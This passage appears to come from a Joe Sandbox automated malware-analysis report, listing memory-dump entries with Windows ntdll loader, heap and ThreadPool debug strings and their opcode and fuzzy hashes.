                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0130106B
                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01301028
                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01300FE5
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0130A9A2
                                                    • apphelp.dll, xrefs: 012C2462
                                                    • LdrpDynamicShimModule, xrefs: 0130A998
                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0130A992
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01322104
                                                    • Process initialization failed with status 0x%08lx, xrefs: 013220F3
                                                    • LdrpInitializationFailure, xrefs: 013220FA
                                                    • `-, xrefs: 013220EB
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$`-$minkernel\ntdll\ldrinit.c
                                                    Strings
                                                    • HEAP[%wZ]: , xrefs: 012B3255
                                                    • HEAP: , xrefs: 012B3264
                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 012B327D
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $@
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0130A121
                                                    • Failed to allocated memory for shimmed module list, xrefs: 0130A10F
                                                    • LdrpCheckModule, xrefs: 0130A117
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 013182E8
                                                    • Failed to reallocate the system dirs string !, xrefs: 013182D7
                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 013182DE
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-1783798831
                                                    Strings
                                                    • PreferredUILanguages, xrefs: 0135C212
                                                    • @, xrefs: 0135C1F1
                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0135C1C5
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                    • API String ID: 0-2968386058
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                    • API String ID: 0-1373925480
                                                    Strings
                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01324888
                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01324899
                                                    • LdrpCheckRedirection, xrefs: 0132488F
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                    • API String ID: 0-3154609507
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-2558761708
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: #%u
                                                    • API String ID: 48624451-232158463
                                                    Strings
                                                    • LdrResSearchResource Enter, xrefs: 012AAA13
                                                    • LdrResSearchResource Exit, xrefs: 012AAA25
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                    • API String ID: 0-4066393604
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `$`
                                                    • API String ID: 0-197956300
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: Legacy$UEFI
                                                    • API String ID: 2994545307-634100481
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$MUI
                                                    • API String ID: 0-17815947
                                                    Strings
                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 012A063D
                                                    • kLsE, xrefs: 012A0540
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                    • API String ID: 0-2547482624
                                                    Strings
                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 012AA2FB
                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 012AA309
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                    • API String ID: 0-2876891731
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: Cleanup Group$Threadpool!
                                                    • API String ID: 2994545307-4008356553
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: MUI
                                                    • API String ID: 0-1339004836
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: GlobalTags
                                                    • API String ID: 0-1106856819
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .mui
                                                    • API String ID: 0-1199573805
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: EXT-
                                                    • API String ID: 0-1948896318
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryHash
                                                    • API String ID: 0-2202222882
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #
                                                    • API String ID: 0-1885708031
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryName
                                                    • API String ID: 0-215506332
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `-
                                                    • API String ID: 0-2038111592
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `-
                                                    • API String ID: 0-2038111592
                                                    Strings
                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0132895E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                    • API String ID: 0-702105204
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                    • Instruction ID: 81b55898be2610977f4eaf7218758e2fb9c59f694c91a09b79a0b3e5a06da96b
                                                    • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                    • Instruction Fuzzy Hash: 53718F71A1061AEFDB14EFA9C984EEEBBB9FF48304F104569E505E7250DB34EA05CB90
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d0e974e459c7fe5ab68152d738e02c43cc32b12f4a06272b5d31db1bf681ff52
                                                    • Instruction ID: a2fb182398d7bc62d22ce9ec75c1be192c102442d978cf57c97ac8369f17fb1d
                                                    • Opcode Fuzzy Hash: d0e974e459c7fe5ab68152d738e02c43cc32b12f4a06272b5d31db1bf681ff52
                                                    • Instruction Fuzzy Hash: 0E7103B2600701FFEB22CF18C846F66BBE6EF80768F154418E216976A1D771EA44CB54
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2669609ed0f3a4732a71a75551a46745d0326916cc48da5245864a1ed7c1ef35
                                                    • Instruction ID: 9499ea84c65fe130cd843631a38f58e18d2d2111d9da460239ccc821b9b9c4aa
                                                    • Opcode Fuzzy Hash: 2669609ed0f3a4732a71a75551a46745d0326916cc48da5245864a1ed7c1ef35
                                                    • Instruction Fuzzy Hash: A2810F72A14306CFDB26CF98C598BAEB7F9BF48318F55412DDA01AB281E3759D01CB90
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 30a00cb12a38da3a29fe276e4a1deb71696346fd02881a39283497f1efe28e24
                                                    • Instruction ID: d3d821bdb66e7f9985d19b1fac8f13047468da3ec45c96aaafde6f3d2e89be7e
                                                    • Opcode Fuzzy Hash: 30a00cb12a38da3a29fe276e4a1deb71696346fd02881a39283497f1efe28e24
                                                    • Instruction Fuzzy Hash: 6E710C71E10209EFEF25DF94C885FEEBBB9FB04364F104159E611B6290E774AA05CB90
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1e359847279f89018bb96eb8c17f6f8c277c6d766198b48fac22c91c77ccdbd3
                                                    • Instruction ID: 22bbe1455441c94569d256bf7b20800db1a79daa4054e82cf1316ab5ef1ee71f
                                                    • Opcode Fuzzy Hash: 1e359847279f89018bb96eb8c17f6f8c277c6d766198b48fac22c91c77ccdbd3
                                                    • Instruction Fuzzy Hash: C451C5B2504752AFD751DEA8C844E6BBBE8EFC5B58F010A29BE40EB250D770DD05C792
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eb12d7618a3372055e7132b3cf4673c7a2b3419d6930aab804e78124a056a262
                                                    • Instruction ID: a6beb3efee1fdf400d273a265710b3424a3ce1b356e3603008fffa1e99164e79
                                                    • Opcode Fuzzy Hash: eb12d7618a3372055e7132b3cf4673c7a2b3419d6930aab804e78124a056a262
                                                    • Instruction Fuzzy Hash: 7C51C070900709DFD721DF9AC884AABFBF8BF54718F10465ED296A76A0C7B0B545CB90
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: de7eb2aa2fa996ca6b1816760f2ea49cbc84e16293ca45337a1b322a953bcfb8
                                                    • Instruction ID: ebaa47c465c68698951cc53204346e1cb147d179777f996cbfd03474d5ede91a
                                                    • Opcode Fuzzy Hash: de7eb2aa2fa996ca6b1816760f2ea49cbc84e16293ca45337a1b322a953bcfb8
                                                    • Instruction Fuzzy Hash: 45514A71220A05DFCB22EFA9C9D0FAAB3F9FF14784F410429E6569B260D734E941CB50
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0b2e0f3fcd1f2f3966831417013c26cec9913f3081575089d9c99b332b98fd3f
                                                    • Instruction ID: 9d107c6a7e9f155c03d3800a7e0781b4d36df49f84a4b53381f93b3b898e047f
                                                    • Opcode Fuzzy Hash: 0b2e0f3fcd1f2f3966831417013c26cec9913f3081575089d9c99b332b98fd3f
                                                    • Instruction Fuzzy Hash: DF5187716083428FD750DF29D880A6BBBE5BFC8A08F444A3DF589C7250EB30E915CB92
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                    • Instruction ID: 2cdcd0fa8b5190362ab9eca24f30df5d9d4b406951ab26ffc585ac89f1bdd321
                                                    • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                    • Instruction Fuzzy Hash: EC519F75E1024AABDF16EF94C860BFFBBB5AF44B54F044269EA01AB240D774D944CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                    • Instruction ID: c4f765e25a90e2a8939d8250025d36391843e0fcc7665279afd803b4b8dce483
                                                    • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                    • Instruction Fuzzy Hash: F051BA71D0422AEFEF11AF98C896BAEBBB9AF00318F154675D61267190D7709D40CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a4d1d5cebed1faea439611804384b05d7d477575b972c17f36bd6397765fcc1
                                                    • Instruction ID: 958baf0fcca350d31e9d8f765a2372cde0167ee0bac8b22ce20ea97ba90044a0
                                                    • Opcode Fuzzy Hash: 0a4d1d5cebed1faea439611804384b05d7d477575b972c17f36bd6397765fcc1
                                                    • Instruction Fuzzy Hash: F441D4B07017019BDB29DB2DC894B7BFB9EEF98228F04C659E9559728CDB70D801C691
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 43bcb6850825f8a6bd1ecb7cb1ca7551572debf45223a1b7cb59b09921244f96
                                                    • Instruction ID: a23b6f976b413f40778ca41b1562463004cf6d7984243671dde4b9f34cf169e9
                                                    • Opcode Fuzzy Hash: 43bcb6850825f8a6bd1ecb7cb1ca7551572debf45223a1b7cb59b09921244f96
                                                    • Instruction Fuzzy Hash: 76518CB290022ADFCB20EFA9C9C09AEBBB9FF48358B515529D505A7700D731AD01CBD0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2cbf9a3be8dd64cf91a788b88002d9c46634af51a8e8a6cf455a30b597ef831e
                                                    • Instruction ID: b826430f3de4fb503b5adf406514840fc03bd78bc0a3fabcd3abf135b418dd35
                                                    • Opcode Fuzzy Hash: 2cbf9a3be8dd64cf91a788b88002d9c46634af51a8e8a6cf455a30b597ef831e
                                                    • Instruction Fuzzy Hash: 5A412B72660206DBDF29EFA8E883F7A7769EB5871CF41046CEE429B245D7B2D810C750
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                    • Instruction ID: fa460c58a5150c77ce946287a89193826a4ada1e3d0e6c5b95bbd5cea02674ba
                                                    • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                    • Instruction Fuzzy Hash: D441E5716107169FEB25CF28C984A6EB7ADFF80318B05C62EE95297648EB30ED14C7D0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d13185bd8c80a0f387e9285c5138b4752c396becbf11ca09441e1855d42333a3
                                                    • Instruction ID: a8bdf8f0763995cab4c24797d653e0df2f2d9d2a4f0ce74d825094e28dc75df0
                                                    • Opcode Fuzzy Hash: d13185bd8c80a0f387e9285c5138b4752c396becbf11ca09441e1855d42333a3
